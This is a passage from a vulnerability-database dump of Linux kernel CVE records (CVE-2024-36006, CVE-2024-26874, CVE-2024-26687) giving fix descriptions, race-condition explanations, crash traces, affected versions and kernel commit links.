},
{
"url": "https://git.kernel.org/stable/c/ea6ce93327bd2c8a0c6cf6f2f0e800f3b778f021"
},
{
"url": "https://git.kernel.org/stable/c/8ae63bd858691bee0e2a92571f2fbb36a4d86d65"
},
{
"url": "https://git.kernel.org/stable/c/8a1f89c98dcc542dd6d287e573523714702e0f9c"
},
{
"url": "https://git.kernel.org/stable/c/9909dde2e53a19585212c32fe3eda482b5faaaa3"
},
{
"url": "https://git.kernel.org/stable/c/24457f1be29f1e7042e50a7749f5c2dde8c433c8"
}
],
"title": "nfs: Handle error of rpc_proc_register() in nfs_net_init().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36939",
"datePublished": "2024-05-30T15:29:27.517Z",
"dateReserved": "2024-05-30T15:25:07.071Z",
"dateUpdated": "2025-05-04T09:12:28.626Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36006 (GCVE-0-2024-36006)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix incorrect list API usage
Both the function that migrates all the chunks within a region and the
function that migrates all the entries within a chunk call
list_first_entry() on the respective lists without checking that the
lists are not empty. This is incorrect usage of the API, which leads to
the following warning [1].
Fix by returning if the lists are empty as there is nothing to migrate
in this case.
[1]
WARNING: CPU: 0 PID: 6437 at drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c:1266 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x1f1/0>
Modules linked in:
CPU: 0 PID: 6437 Comm: kworker/0:37 Not tainted 6.9.0-rc3-custom-00883-g94a65f079ef6 #39
Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019
Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work
RIP: 0010:mlxsw_sp_acl_tcam_vchunk_migrate_all+0x1f1/0x2c0
[...]
Call Trace:
<TASK>
mlxsw_sp_acl_tcam_vregion_rehash_work+0x6c/0x4a0
process_one_work+0x151/0x370
worker_thread+0x2cb/0x3e0
kthread+0xd0/0x100
ret_from_fork+0x34/0x50
ret_from_fork_asm+0x1a/0x30
</TASK>
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36006",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:00:50.884985Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:57.118Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.329Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b2c13b670b168e324e1cf109e67056a20fd610a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09846c2309b150b8ce4e0ce96f058197598fc530"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/64435b64e43d8ee60faa46c0cd04e323e8b2a7b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4526a56e02da3725db979358964df9cd9c567154"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab4ecfb627338e440ae11def004c524a00d93e40"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af8b593c3dd9df82cb199be65863af004b09fd97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b377add0f0117409c418ddd6504bd682ebe0bf79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0b2c13b670b168e324e1cf109e67056a20fd610a",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "09846c2309b150b8ce4e0ce96f058197598fc530",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "64435b64e43d8ee60faa46c0cd04e323e8b2a7b0",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "4526a56e02da3725db979358964df9cd9c567154",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "ab4ecfb627338e440ae11def004c524a00d93e40",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "af8b593c3dd9df82cb199be65863af004b09fd97",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "b377add0f0117409c418ddd6504bd682ebe0bf79",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix incorrect list API usage\n\nBoth the function that migrates all the chunks within a region and the\nfunction that migrates all the entries within a chunk call\nlist_first_entry() on the respective lists without checking that the\nlists are not empty. This is incorrect usage of the API, which leads to\nthe following warning [1].\n\nFix by returning if the lists are empty as there is nothing to migrate\nin this case.\n\n[1]\nWARNING: CPU: 0 PID: 6437 at drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c:1266 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x1f1/0\u003e\nModules linked in:\nCPU: 0 PID: 6437 Comm: kworker/0:37 Not tainted 6.9.0-rc3-custom-00883-g94a65f079ef6 #39\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:mlxsw_sp_acl_tcam_vchunk_migrate_all+0x1f1/0x2c0\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x6c/0x4a0\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:22.021Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0b2c13b670b168e324e1cf109e67056a20fd610a"
},
{
"url": "https://git.kernel.org/stable/c/09846c2309b150b8ce4e0ce96f058197598fc530"
},
{
"url": "https://git.kernel.org/stable/c/64435b64e43d8ee60faa46c0cd04e323e8b2a7b0"
},
{
"url": "https://git.kernel.org/stable/c/4526a56e02da3725db979358964df9cd9c567154"
},
{
"url": "https://git.kernel.org/stable/c/ab4ecfb627338e440ae11def004c524a00d93e40"
},
{
"url": "https://git.kernel.org/stable/c/af8b593c3dd9df82cb199be65863af004b09fd97"
},
{
"url": "https://git.kernel.org/stable/c/b377add0f0117409c418ddd6504bd682ebe0bf79"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix incorrect list API usage",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36006",
"datePublished": "2024-05-20T09:48:06.278Z",
"dateReserved": "2024-05-17T13:50:33.150Z",
"dateUpdated": "2025-05-04T09:10:22.021Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26874 (GCVE-0-2024-26874)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip
It's possible that mtk_crtc->event is NULL in
mtk_drm_crtc_finish_page_flip().
pending_needs_vblank value is set by mtk_crtc->event, but in
mtk_drm_crtc_atomic_flush(), it's is not guarded by the same
lock in mtk_drm_finish_page_flip(), thus a race condition happens.
Consider the following case:
CPU1 CPU2
step 1:
mtk_drm_crtc_atomic_begin()
mtk_crtc->event is not null,
step 1:
mtk_drm_crtc_atomic_flush:
mtk_drm_crtc_update_config(
!!mtk_crtc->event)
step 2:
mtk_crtc_ddp_irq ->
mtk_drm_finish_page_flip:
lock
mtk_crtc->event set to null,
pending_needs_vblank set to false
unlock
pending_needs_vblank set to true,
step 2:
mtk_crtc_ddp_irq ->
mtk_drm_finish_page_flip called again,
pending_needs_vblank is still true
//null pointer
Instead of guarding the entire mtk_drm_crtc_atomic_flush(), it's more
efficient to just check if mtk_crtc->event is null before use.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d Version: 119f5173628aa7a0c3cf9db83460d40709e8241d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26874",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-23T14:01:58.775611Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:21.785Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.219Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/accdac6b71d5a2b84040c3d2234f53a60edc398e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dfde84cc6c589f2a9f820f12426d97365670b731"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4688be96d20ffa49d2186523ee84f475f316fd49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9beec711a17245b853d64488fd5b739031612340"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d2bd30c710475b2e29288827d2c91f9e6e2b91d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a3dd12b64ae8373a41a216a0b621df224210860a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9acee29a38b4d4b70f1f583e5ef9a245db4db710"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3fc88b246a2fc16014e374040fc15af1d3752535"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c958e86e9cc1b48cac004a6e245154dfba8e163b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/mediatek/mtk_drm_crtc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "accdac6b71d5a2b84040c3d2234f53a60edc398e",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "dfde84cc6c589f2a9f820f12426d97365670b731",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "4688be96d20ffa49d2186523ee84f475f316fd49",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "9beec711a17245b853d64488fd5b739031612340",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "d2bd30c710475b2e29288827d2c91f9e6e2b91d7",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "a3dd12b64ae8373a41a216a0b621df224210860a",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "9acee29a38b4d4b70f1f583e5ef9a245db4db710",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "3fc88b246a2fc16014e374040fc15af1d3752535",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
},
{
"lessThan": "c958e86e9cc1b48cac004a6e245154dfba8e163b",
"status": "affected",
"version": "119f5173628aa7a0c3cf9db83460d40709e8241d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/mediatek/mtk_drm_crtc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip\n\nIt\u0027s possible that mtk_crtc-\u003eevent is NULL in\nmtk_drm_crtc_finish_page_flip().\n\npending_needs_vblank value is set by mtk_crtc-\u003eevent, but in\nmtk_drm_crtc_atomic_flush(), it\u0027s is not guarded by the same\nlock in mtk_drm_finish_page_flip(), thus a race condition happens.\n\nConsider the following case:\n\nCPU1 CPU2\nstep 1:\nmtk_drm_crtc_atomic_begin()\nmtk_crtc-\u003eevent is not null,\n step 1:\n mtk_drm_crtc_atomic_flush:\n mtk_drm_crtc_update_config(\n !!mtk_crtc-\u003eevent)\nstep 2:\nmtk_crtc_ddp_irq -\u003e\nmtk_drm_finish_page_flip:\nlock\nmtk_crtc-\u003eevent set to null,\npending_needs_vblank set to false\nunlock\n pending_needs_vblank set to true,\n\n step 2:\n mtk_crtc_ddp_irq -\u003e\n mtk_drm_finish_page_flip called again,\n pending_needs_vblank is still true\n //null pointer\n\nInstead of guarding the entire mtk_drm_crtc_atomic_flush(), it\u0027s more\nefficient to just check if mtk_crtc-\u003eevent is null before use."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:35.767Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/accdac6b71d5a2b84040c3d2234f53a60edc398e"
},
{
"url": "https://git.kernel.org/stable/c/dfde84cc6c589f2a9f820f12426d97365670b731"
},
{
"url": "https://git.kernel.org/stable/c/4688be96d20ffa49d2186523ee84f475f316fd49"
},
{
"url": "https://git.kernel.org/stable/c/9beec711a17245b853d64488fd5b739031612340"
},
{
"url": "https://git.kernel.org/stable/c/d2bd30c710475b2e29288827d2c91f9e6e2b91d7"
},
{
"url": "https://git.kernel.org/stable/c/a3dd12b64ae8373a41a216a0b621df224210860a"
},
{
"url": "https://git.kernel.org/stable/c/9acee29a38b4d4b70f1f583e5ef9a245db4db710"
},
{
"url": "https://git.kernel.org/stable/c/3fc88b246a2fc16014e374040fc15af1d3752535"
},
{
"url": "https://git.kernel.org/stable/c/c958e86e9cc1b48cac004a6e245154dfba8e163b"
}
],
"title": "drm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26874",
"datePublished": "2024-04-17T10:27:33.278Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:35.767Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26687 (GCVE-0-2024-26687)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xen/events: close evtchn after mapping cleanup
shutdown_pirq and startup_pirq are not taking the
irq_mapping_update_lock because they can't due to lock inversion. Both
are called with the irq_desc->lock being taking. The lock order,
however, is first irq_mapping_update_lock and then irq_desc->lock.
This opens multiple races:
- shutdown_pirq can be interrupted by a function that allocates an event
channel:
CPU0 CPU1
shutdown_pirq {
xen_evtchn_close(e)
__startup_pirq {
EVTCHNOP_bind_pirq
-> returns just freed evtchn e
set_evtchn_to_irq(e, irq)
}
xen_irq_info_cleanup() {
set_evtchn_to_irq(e, -1)
}
}
Assume here event channel e refers here to the same event channel
number.
After this race the evtchn_to_irq mapping for e is invalid (-1).
- __startup_pirq races with __unbind_from_irq in a similar way. Because
__startup_pirq doesn't take irq_mapping_update_lock it can grab the
evtchn that __unbind_from_irq is currently freeing and cleaning up. In
this case even though the event channel is allocated, its mapping can
be unset in evtchn_to_irq.
The fix is to first cleanup the mappings and then close the event
channel. In this way, when an event channel gets allocated it's
potential previous evtchn_to_irq mappings are guaranteed to be unset already.
This is also the reverse order of the allocation where first the event
channel is allocated and then the mappings are setup.
On a 5.10 kernel prior to commit 3fcdaf3d7634 ("xen/events: modify internal
[un]bind interfaces"), we hit a BUG like the following during probing of NVMe
devices. The issue is that during nvme_setup_io_queues, pci_free_irq
is called for every device which results in a call to shutdown_pirq.
With many nvme devices it's therefore likely to hit this race during
boot because there will be multiple calls to shutdown_pirq and
startup_pirq are running potentially in parallel.
------------[ cut here ]------------
blkfront: xvda: barrier or flush: disabled; persistent grants: enabled; indirect descriptors: enabled; bounce buffer: enabled
kernel BUG at drivers/xen/events/events_base.c:499!
invalid opcode: 0000 [#1] SMP PTI
CPU: 44 PID: 375 Comm: kworker/u257:23 Not tainted 5.10.201-191.748.amzn2.x86_64 #1
Hardware name: Xen HVM domU, BIOS 4.11.amazon 08/24/2006
Workqueue: nvme-reset-wq nvme_reset_work
RIP: 0010:bind_evtchn_to_cpu+0xdf/0xf0
Code: 5d 41 5e c3 cc cc cc cc 44 89 f7 e8 2b 55 ad ff 49 89 c5 48 85 c0 0f 84 64 ff ff ff 4c 8b 68 30 41 83 fe ff 0f 85 60 ff ff ff <0f> 0b 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 0f 1f 44 00 00
RSP: 0000:ffffc9000d533b08 EFLAGS: 00010046
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000006
RDX: 0000000000000028 RSI: 00000000ffffffff RDI: 00000000ffffffff
RBP: ffff888107419680 R08: 0000000000000000 R09: ffffffff82d72b00
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000001ed
R13: 0000000000000000 R14: 00000000ffffffff R15: 0000000000000002
FS: 0000000000000000(0000) GS:ffff88bc8b500000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000002610001 CR4: 00000000001706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
? show_trace_log_lvl+0x1c1/0x2d9
? show_trace_log_lvl+0x1c1/0x2d9
? set_affinity_irq+0xdc/0x1c0
? __die_body.cold+0x8/0xd
? die+0x2b/0x50
? do_trap+0x90/0x110
? bind_evtchn_to_cpu+0xdf/0xf0
? do_error_trap+0x65/0x80
? bind_evtchn_to_cpu+0xdf/0xf0
? exc_invalid_op+0x4e/0x70
? bind_evtchn_to_cpu+0xdf/0xf0
? asm_exc_invalid_op+0x12/0x20
? bind_evtchn_to_cpu+0xdf/0x
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 Version: d46a78b05c0e37f76ddf4a7a67bf0b6c68bada55 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.637Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9470f5b2503cae994098dea9682aee15b313fa44"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0fc88aeb2e32b76db3fe6a624b8333dbe621b8fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea592baf9e41779fe9a0424c03dd2f324feca3b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/585a344af6bcac222608a158fc2830ff02712af5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/20980195ec8d2e41653800c45c8c367fa1b1f2b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9be71aa12afa91dfe457b3fb4a444c42b1ee036b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa765c4b4aed2d64266b694520ecb025c862c5a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26687",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
